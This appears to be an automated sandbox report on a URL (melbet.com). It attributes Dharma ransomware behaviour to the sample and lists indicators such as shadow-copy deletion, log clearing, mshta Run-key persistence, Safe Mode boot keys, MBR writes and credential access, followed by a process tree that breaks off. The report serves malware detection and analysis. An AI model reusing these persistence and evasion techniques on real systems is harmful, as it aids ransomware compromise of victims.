Analysis
max time kernel: 819s
max time network: 979s
platform: windows10-2004_x64
resource: win10v2004-20250217-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05/03/2025, 17:07
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: http://melbet.com
Resource: win10v2004-20250217-en
Behavioral task: behavioral2
Sample: http://melbet.com
Resource: win11-20250218-en
General
-
Target
http://melbet.com
Malware Config
Signatures
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Clears Windows event logs 1 TTPs 64 IoCs
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid | Process
8896 | net.exe
7796 | net1.exe
-
Renames multiple (716) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Sets service image path in registry 2 TTPs 6 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\mssql.sys" | mssql.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\sxwkiyeefcobuzdfb\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\sxwkiyeefcobuzdfb.sys" | mssql.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\erexdgzqeuzcpc\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\erexdgzqeuzcpc.sys" | mssql.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\agruzawdrtcynl\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\agruzawdrtcynl.sys" | mssql.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\pverubcretemktj\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\pverubcretemktj.sys" | mssql.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\mssqlaq.sys" | mssql.exe
-
Checks computer location settings 2 TTPs 17 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | unlocker.tmp, LogDelete.exe, 1sass.exe, loader.exe
The same key value is queried in the remaining 13 entries, each listed as Process not Found.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 5 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F6ED3317.[[email protected]].ROGER | 1sass.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F6ED3317.[[email protected]].ROGER | 1sass.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta | 1sass.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1sass.exe | 1sass.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | 1sass.exe
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 33 IoCs
pid | Process
3036 | 1sass.exe
3684 | mssql2.exe
1436 | nc123.exe
3904 | mssql.exe
6172 | SearchHost.exe
6768 | unlocker.exe
7752 | unlocker.tmp
8640 | LogDelete.exe
8080 | loader.exe
6484 | MouseLock.exe
Remaining 23 entries: Process not Found.
-
Impair Defenses: Safe Mode Boot 1 TTPs 8 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\erexdgzqeuzcpc.sys | mssql.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\EREXDGZQEUZCPC.SYS | mssql.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\agruzawdrtcynl.sys | mssql.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\AGRUZAWDRTCYNL.SYS | mssql.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\PVERUBCRETEMKTJ.SYS | mssql.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\pverubcretemktj.sys | mssql.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\sxwkiyeefcobuzdfb.sys | mssql.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\SXWKIYEEFCOBUZDFB.SYS | mssql.exe
-
Loads dropped DLL 24 IoCs
pid | Process
7752 | unlocker.tmp
Remaining 23 entries: Process not Found.
-
Modifies system executable filetype association 2 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" | Process not Found
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" | 1sass.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1sass.exe = "C:\\Windows\\System32\\1sass.exe" | 1sass.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" | 1sass.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 64 IoCs
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\D: | SearchHost.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow | ioc
354 | drive.google.com
355 | drive.google.com
349 | camo.githubusercontent.com
353 | drive.google.com
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Power Settings 1 TTPs 1 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid | Process
8396 | wevtutil.exe
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description | ioc | Process
File opened for modification | \??\PhysicalDrive0 | Process not Found
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x003f00000002356e-11139.dat | autoit_exe
behavioral1/files/0x00070000000248c3-11082.dat | autoit_exe
-
Drops file in System32 directory 2 IoCs
description | ioc | Process
File created | C:\Windows\System32\1sass.exe | 1sass.exe
File created | C:\Windows\System32\Info.hta | 1sass.exe
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wevtutil.exe, nc123.exe, 1sass.exe, cmd.exe, Process not Found
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
7428 | cmd.exe
6796 | PING.EXE
-
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid | Process
3164 | wevtutil.exe
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
-
Enumerates system info in registry 2 TTPs 9 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
-
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
11172 | vssadmin.exe
6596 | vssadmin.exe
-
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856681605938755" | chrome.exe
-
Modifies registry class 31 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\InprocServer32 | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\FLAGS | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\0\win64 | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3} | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\FLAGS\ = "0" | Process not Found
Key created | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | 7zG.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\PfShellExtension.DLL | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\UnLockerMenu | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\UnLockerMenu | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | 7zG.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\PfShellExtension.DLL\AppID = "{59A55EF0-525F-4276-AB62-8F7E5F230399}" | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\InprocServer32\ = "C:\\Program Files (x86)\\IObit\\IObit Unlocker\\IObitUnlockerExtension.dll" | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\ = "PfShellExtension 1.0 Type Library" | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\0 | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\HELPDIR | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" | Process not Found
Key created | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings | chrome.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE} | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{59A55EF0-525F-4276-AB62-8F7E5F230399}\ = "PfShellExtension" | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\ = "UnLockerMenu Class" | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\InprocServer32\ThreadingModel = "Apartment" | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\UnLockerMenu | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\IObit\\IObit Unlocker" | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{59A55EF0-525F-4276-AB62-8F7E5F230399} | Process not Found
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0 | Process not Found
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\0\win64\ = "C:\\Program Files (x86)\\IObit\\IObit Unlocker\\IObitUnlockerExtension.dll" | Process not Found
-
Modifies registry key 1 TTPs 3 IoCs
pid | Process
11788 | Process not Found
2376 | Process not Found
8552 | Process not Found
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
6796 | PING.EXE
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid | Process
2068 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
4252 | msedge.exe
3168 | msedge.exe
1848 | identity_helper.exe
5572 | chrome.exe
5440 | msedge.exe
5152 | msedge.exe
5624 | chrome.exe
3036 | 1sass.exe
7752 | unlocker.tmp
8080 | loader.exe
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid | Process
4868 | 7zG.exe
6484 | MouseLock.exe
-
Suspicious behavior: LoadsDriver 33 IoCs
pid | Process
3904 | mssql.exe
660 | Process not Found
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 43 IoCs
pid | Process
3168 | msedge.exe
5572 | chrome.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeShutdownPrivilege | 5572 | chrome.exe
Token: SeCreatePagefilePrivilege | 5572 | chrome.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
pid | Process
3168 | msedge.exe
-
Suspicious use of SendNotifyMessage 64 IoCs
pid | Process
3168 | msedge.exe
5572 | chrome.exe
6172 | SearchHost.exe
8080 | loader.exe
-
Suspicious use of SetWindowsHookEx 25 IoCs
pid | Process
2068 | WINWORD.EXE
3684 | mssql2.exe
3904 | mssql.exe
6172 | SearchHost.exe
10600 | Process not Found
9524 | Process not Found
-
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 3168 wrote to memory of 2072 | 3168 | msedge.exe | 85
PID 3168 wrote to memory of 208 | 3168 | msedge.exe | 86
PID 3168 wrote to memory of 4252 | 3168 | msedge.exe | 87
PID 3168 wrote to memory of 4892 | 3168 | msedge.exe | 88
-
System policy modification 1 TTPs 1 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection | Process not Found
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://melbet.com
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3168
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffeac6946f8,0x7ffeac694708,0x7ffeac694718
2⤵
PID:2072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
2⤵
PID:208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
2⤵
PID:4892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
2⤵
PID:2376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
2⤵
PID:2400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
2⤵
PID:1788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
2⤵
PID:1956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
2⤵
PID:1496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
2⤵
PID:4836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
2⤵
PID:1672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
2⤵
PID:3768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
2⤵
PID:3516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
2⤵
PID:3648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
2⤵
PID:2344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
2⤵
PID:1948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
2⤵
PID:5956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
2⤵
PID:6004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
2⤵
PID:336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
2⤵
PID:5688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
2⤵
PID:3156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2000 /prefetch:1
2⤵
PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
